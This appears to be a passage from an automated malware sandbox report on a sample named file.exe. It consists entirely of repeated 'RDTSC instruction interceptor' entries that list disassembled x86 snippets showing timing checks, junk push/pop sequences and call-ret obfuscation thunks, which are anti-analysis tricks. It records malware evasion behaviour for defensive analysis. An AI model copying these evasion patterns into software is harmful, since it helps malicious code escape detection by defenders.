Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32A32C second address: 32A3E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 js 00007F2749204C2Fh 0x0000000c je 00007F2749204C29h 0x00000012 movzx esi, cx 0x00000015 push 00000003h 0x00000017 jmp 00007F2749204C2Dh 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push ecx 0x00000021 call 00007F2749204C28h 0x00000026 pop ecx 0x00000027 mov dword ptr [esp+04h], ecx 0x0000002b add dword ptr [esp+04h], 00000015h 0x00000033 inc ecx 0x00000034 push ecx 0x00000035 ret 0x00000036 pop ecx 0x00000037 ret 0x00000038 mov edx, esi 0x0000003a push 00000003h 0x0000003c jp 00007F2749204C26h 0x00000042 push 6F283D06h 0x00000047 jmp 00007F2749204C30h 0x0000004c add dword ptr [esp], 50D7C2FAh 0x00000053 call 00007F2749204C39h 0x00000058 call 00007F2749204C2Fh 0x0000005d pop edi 0x0000005e pop edi 0x0000005f jmp 00007F2749204C2Ch 0x00000064 lea ebx, dword ptr [ebp+12460F3Ch] 0x0000006a mov dword ptr [ebp+122D1C09h], esi 0x00000070 xchg eax, ebx 0x00000071 push eax 0x00000072 push edx 0x00000073 pushad 0x00000074 pushad 0x00000075 popad 0x00000076 js 00007F2749204C26h 0x0000007c popad 0x0000007d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32A443 second address: 32A456 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F27492B5206h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007F27492B5206h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32A456 second address: 32A45A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32A45A second address: 32A4B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jne 00007F27492B520Ah 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007F27492B5208h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 push 00000000h 0x0000002b call 00007F27492B5209h 0x00000030 jmp 00007F27492B5211h 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F27492B520Ah 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32A4B9 second address: 32A502 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F2749204C2Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F2749204C37h 0x00000013 mov eax, dword ptr [eax] 0x00000015 jg 00007F2749204C32h 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f pushad 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32A502 second address: 32A5B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007F27492B5208h 0x0000000b popad 0x0000000c pop eax 0x0000000d sbb edx, 0E1DC892h 0x00000013 push 00000003h 0x00000015 jmp 00007F27492B520Fh 0x0000001a push esi 0x0000001b movzx edi, ax 0x0000001e pop ecx 0x0000001f push 00000000h 0x00000021 jbe 00007F27492B5220h 0x00000027 push 00000003h 0x00000029 push 00000000h 0x0000002b push esi 0x0000002c call 00007F27492B5208h 0x00000031 pop esi 0x00000032 mov dword ptr [esp+04h], esi 0x00000036 add dword ptr [esp+04h], 0000001Bh 0x0000003e inc esi 0x0000003f push esi 0x00000040 ret 0x00000041 pop esi 0x00000042 ret 0x00000043 or dword ptr [ebp+122D2DD3h], esi 0x00000049 call 00007F27492B5209h 0x0000004e pushad 0x0000004f jmp 00007F27492B520Dh 0x00000054 jmp 00007F27492B520Fh 0x00000059 popad 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d jnc 00007F27492B520Ch 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32A5B0 second address: 32A605 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2749204C32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007F2749204C35h 0x00000012 mov eax, dword ptr [eax] 0x00000014 push esi 0x00000015 push ebx 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 pop ebx 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e pushad 0x0000001f jmp 00007F2749204C36h 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34BE25 second address: 34BE4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 jmp 00007F27492B5215h 0x0000000d pop ecx 0x0000000e push eax 0x0000000f jp 00007F27492B5206h 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 349CF3 second address: 349D24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2749204C32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jmp 00007F2749204C35h 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 349D24 second address: 349D3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F27492B5213h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 349D3B second address: 349D85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F2749204C37h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jno 00007F2749204C26h 0x00000012 jmp 00007F2749204C33h 0x00000017 popad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F2749204C2Fh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 349D85 second address: 349DA2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27492B5217h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 349ECF second address: 349EE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F2749204C2Eh 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 349EE5 second address: 349EEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34A76A second address: 34A79C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2749204C36h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007F2749204C28h 0x00000011 push esi 0x00000012 pop esi 0x00000013 jc 00007F2749204C2Eh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34A903 second address: 34A90E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F27492B5206h 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34A90E second address: 34A91B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F2749204C26h 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34A91B second address: 34A941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007F27492B521Bh 0x00000011 jns 00007F27492B5206h 0x00000017 jmp 00007F27492B520Fh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34A941 second address: 34A94A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34AC0F second address: 34AC3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27492B5210h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F27492B5217h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33FD98 second address: 33FDAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2749204C31h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 316149 second address: 31614D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31614D second address: 316153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34AF20 second address: 34AF29 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34AF29 second address: 34AF31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34AF31 second address: 34AF36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34AF36 second address: 34AF41 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34AF41 second address: 34AF47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34F445 second address: 34F449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34F449 second address: 34F482 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 jmp 00007F27492B5217h 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 popad 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F27492B520Ah 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34F482 second address: 34F488 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34F488 second address: 34F48D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34F565 second address: 34F57C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2749204C33h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34F716 second address: 34F71C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34F71C second address: 34F723 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31E7F4 second address: 31E80F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F27492B5216h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3578FA second address: 357917 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2749204C35h 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 357917 second address: 357941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F27492B5216h 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F27492B520Bh 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 357941 second address: 357945 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 312C5F second address: 312C66 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 312C66 second address: 312C70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 312C70 second address: 312C76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 312C76 second address: 312C81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ecx 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3571B1 second address: 3571CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F27492B5216h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3571CC second address: 3571DD instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2749204C2Ch 0x00000008 jc 00007F2749204C26h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3571DD second address: 3571E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3574D2 second address: 3574EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F2749204C32h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3574EC second address: 3574F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35763A second address: 35763E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 359EFE second address: 359F03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35A90E second address: 35A94C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2749204C37h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c and di, 3022h 0x00000011 xchg eax, ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 jmp 00007F2749204C36h 0x0000001a pop eax 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35A94C second address: 35A952 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35A952 second address: 35A956 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35A956 second address: 35A968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a je 00007F27492B520Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35AE41 second address: 35AEA0 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2749204C28h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov dword ptr [ebp+122D1B9Bh], ebx 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ecx 0x0000001a call 00007F2749204C28h 0x0000001f pop ecx 0x00000020 mov dword ptr [esp+04h], ecx 0x00000024 add dword ptr [esp+04h], 00000014h 0x0000002c inc ecx 0x0000002d push ecx 0x0000002e ret 0x0000002f pop ecx 0x00000030 ret 0x00000031 mov edi, eax 0x00000033 xchg eax, ebx 0x00000034 jmp 00007F2749204C2Dh 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F2749204C37h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35CA72 second address: 35CA77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35C0BF second address: 35C0C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35CA77 second address: 35CAE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F27492B520Eh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F27492B520Eh 0x00000012 nop 0x00000013 mov dword ptr [ebp+1245EDD3h], edx 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c jp 00007F27492B5209h 0x00000022 movsx edi, si 0x00000025 pop esi 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push esi 0x0000002b call 00007F27492B5208h 0x00000030 pop esi 0x00000031 mov dword ptr [esp+04h], esi 0x00000035 add dword ptr [esp+04h], 0000001Ch 0x0000003d inc esi 0x0000003e push esi 0x0000003f ret 0x00000040 pop esi 0x00000041 ret 0x00000042 mov esi, dword ptr [ebp+122D24A7h] 0x00000048 push eax 0x00000049 push eax 0x0000004a pushad 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35C0C5 second address: 35C0C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35C0C9 second address: 35C0EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F27492B5213h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35C0EB second address: 35C0F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35ECF5 second address: 35ECFF instructions: 0x00000000 rdtsc 0x00000002 jp 00007F27492B5206h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35ECFF second address: 35EDB4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2749204C2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F2749204C28h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push ebp 0x00000029 call 00007F2749204C28h 0x0000002e pop ebp 0x0000002f mov dword ptr [esp+04h], ebp 0x00000033 add dword ptr [esp+04h], 0000001Bh 0x0000003b inc ebp 0x0000003c push ebp 0x0000003d ret 0x0000003e pop ebp 0x0000003f ret 0x00000040 ja 00007F2749204C2Ch 0x00000046 push 00000000h 0x00000048 push 00000000h 0x0000004a push esi 0x0000004b call 00007F2749204C28h 0x00000050 pop esi 0x00000051 mov dword ptr [esp+04h], esi 0x00000055 add dword ptr [esp+04h], 00000019h 0x0000005d inc esi 0x0000005e push esi 0x0000005f ret 0x00000060 pop esi 0x00000061 ret 0x00000062 mov di, dx 0x00000065 jmp 00007F2749204C31h 0x0000006a xchg eax, ebx 0x0000006b push eax 0x0000006c push edx 0x0000006d push eax 0x0000006e jmp 00007F2749204C36h 0x00000073 pop eax 0x00000074 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35EDB4 second address: 35EDBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35EDBA second address: 35EDD9 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2749204C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F2749204C30h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35F935 second address: 35F93B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35F93B second address: 35F959 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2749204C39h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35F959 second address: 35F965 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36034C second address: 360367 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2749204C2Bh 0x00000009 popad 0x0000000a pop esi 0x0000000b push eax 0x0000000c pushad 0x0000000d jc 00007F2749204C2Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 360367 second address: 3603FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F27492B5219h 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007F27492B5208h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 jmp 00007F27492B5219h 0x0000002a mov dword ptr [ebp+122D1B61h], edi 0x00000030 mov di, F9C2h 0x00000034 push 00000000h 0x00000036 jmp 00007F27492B520Fh 0x0000003b push 00000000h 0x0000003d sub edi, dword ptr [ebp+122D2C44h] 0x00000043 push eax 0x00000044 push eax 0x00000045 push edx 0x00000046 push esi 0x00000047 jmp 00007F27492B5215h 0x0000004c pop esi 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3603FF second address: 360405 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 364945 second address: 364949 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 364949 second address: 36496B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F2749204C39h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 364A92 second address: 364A96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36683A second address: 36683E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3659E6 second address: 3659ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36683E second address: 366896 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F2749204C28h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007F2749204C28h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c push 00000000h 0x0000002e mov edi, edx 0x00000030 push 00000000h 0x00000032 mov ebx, dword ptr [ebp+122D1B14h] 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F2749204C38h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 364B50 second address: 364B6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27492B5211h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
